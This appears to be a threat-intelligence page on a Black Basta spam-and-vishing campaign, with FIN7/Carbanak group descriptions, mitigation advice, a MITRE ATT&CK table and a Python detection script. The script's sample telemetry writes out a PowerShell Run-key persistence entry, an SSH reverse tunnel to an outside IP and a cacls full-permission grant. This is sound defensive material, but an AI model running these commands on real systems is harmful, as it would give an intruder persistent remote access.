
Black Basta is Bombarding Organisations with Fake Emails and Phone Calls
Indicators of Compromise
APT Groups
Description of MISP: Groups targeting financial organizations or people with significant financial assets.

Description of Mitre: Carbanak is a threat group that mainly targets banks. It also refers to malware of the same name (Carbanak). It is sometimes referred to as FIN7, but these appear to be two groups using the same Carbanak malware and are therefore tracked separately. [1] [2]

Description of Etda: FIN7 is a financially-motivated threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. They often use point-of-sale malware. A portion of FIN7 was run out of a front company called Combi Security. FIN7 is sometimes referred to as Carbanak or Anunak, but these appear to be two groups using the same Carbanak malware and are therefore tracked separately. The reported arrests concerned the mastermind of Carbanak rather than FIN7; however, security research teams have kept referring to this arrest for all FIN7 activities since.
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
RECOMMENDATIONS
Steps to Enhance Cybersecurity
In response to recent cyber attacks, the following steps are recommended to protect your organization:
1. Baseline Your Environment and Use Application Allowlisting
Evaluate your environment by baselining all installed remote monitoring and management (RMM) solutions. Utilize application allowlisting solutions such as AppLocker or Microsoft Defender Application Control to block the execution of all unapproved RMM solutions. For instance, the Quick Assist tool (quickassist.exe) can be blocked from executing via AppLocker. Additionally, it is important to block domains associated with all unapproved RMM solutions. A public GitHub repository provides a catalog of RMM solutions, their binary names, and associated domains.
2. User Awareness and Communication Channels
Ensure that users are aware of the established IT channels and communication methods within your organization to recognize and prevent common social engineering attacks. It is also recommended that users be encouraged to report any suspicious phone calls and texts claiming to be from internal IT staff.
These steps will help your organization become more resilient against cyber attacks and enable users to identify and report suspicious activities effectively.
MITRE ATT&CK Techniques
| Tactic | Technique | Procedure |
| --- | --- | --- |
| Denial of Service | T1498: Network Denial of Service | The threat actor overwhelms email protection solutions with spam. |
| Initial Access | T1566.004: Phishing: Spearphishing Voice | The threat actor calls impacted users and pretends to be a member of their organization's IT team to gain remote access. |
| Execution | T1059.003: Command and Scripting Interpreter: Windows Command Shell | The threat actor executes a batch script after establishing remote access to a user's asset. |
| Execution | T1059.001: Command and Scripting Interpreter: PowerShell | Batch scripts used by the threat actor execute certain commands via PowerShell. |
| Persistence | T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | The threat actor creates a run key to execute a batch script via PowerShell, which then attempts to establish a reverse tunnel via SSH. |
| Defense Evasion | T1222.001: File and Directory Permissions Modification: Windows File and Directory Permissions Modification | The threat actor uses cacls.exe via batch script to modify file permissions. |
| Defense Evasion | T1140: Deobfuscate/Decode Files or Information | The threat actor encrypted several zip archive payloads with the password "qaz123". |
| Credential Access | T1056.001: Input Capture: Keylogging | The threat actor runs a batch script that records the user's password via command line input. |
| Discovery | T1033: System Owner/User Discovery | The threat actor uses whoami.exe to evaluate whether the impacted user is an administrator or not. |
| Lateral Movement | T1570: Lateral Tool Transfer | Impacket was used to move payloads between compromised systems. |
| Command and Control | T1572: Protocol Tunneling | An SSH reverse tunnel is used to provide the threat actor with persistent remote access. |
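As an added example (not code from the original report or from any vendor), the following Python triage function applies the RMM allowlisting guidance and the procedures in the table above to constructed Sysmon-style telemetry: it flags a known RMM binary that is absent from the allowlist, a run key whose value launches PowerShell, an ssh.exe invocation using the remote port forward option, and cacls.exe use. The allowlist, the catalog excerpt and every event value are assumptions constructed for this demonstration.

```python
import re

# Constructed allowlist: the one RMM tool this example assumes is sanctioned.
APPROVED_RMM = {"teamviewer.exe"}
# Constructed excerpt of an RMM catalog (binary names only); the public catalog is far larger.
KNOWN_RMM = {"quickassist.exe", "anydesk.exe", "teamviewer.exe", "screenconnect.clientservice.exe"}

RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
SSH_REVERSE = re.compile(r"(^|\s)-R\s+\S+")  # OpenSSH remote port forward option

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def triage(events):
    """Map Sysmon-style event dicts to (rule, detail) findings for the TTPs in the table."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            img, cmd = basename(ev["image"]), ev.get("cmdline", "")
            if img in KNOWN_RMM and img not in APPROVED_RMM:      # unapproved RMM tool (recommendation 1)
                findings.append(("unapproved_rmm", img))
            if img == "ssh.exe" and SSH_REVERSE.search(cmd):      # T1572 protocol tunneling
                findings.append(("ssh_reverse_tunnel", cmd))
            if img == "cacls.exe":                                # T1222.001 permission modification
                findings.append(("acl_modification", cmd))
        elif ev["type"] == "registry" and RUN_KEY.search(ev["key"]):
            if "powershell" in ev["data"].lower():                # T1547.001 run key launching PowerShell
                findings.append(("run_key_powershell", ev["key"]))
    return findings

# Constructed sample telemetry, ordered as the intrusion chain in the table.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Program Files\TeamViewer\TeamViewer.exe", "cmdline": ""},
    {"type": "process", "image": r"C:\Windows\System32\quickassist.exe", "cmdline": "quickassist.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r'powershell.exe -c "cmd /c C:\Users\Public\update.bat"'},
    {"type": "process", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -N -R 2222:127.0.0.1:22 svc@203.0.113.5"},
    {"type": "process", "image": r"C:\Windows\System32\cacls.exe",
     "cmdline": r"cacls.exe C:\Users\Public\update.bat /E /G Everyone:F"},
    {"type": "process", "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami /groups"},
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"{rule:<20} {detail}")
```

The whoami.exe event is deliberately left unflagged: on its own it is too noisy to alert on, and the table lists it as a discovery step that only matters in the context of the preceding findings.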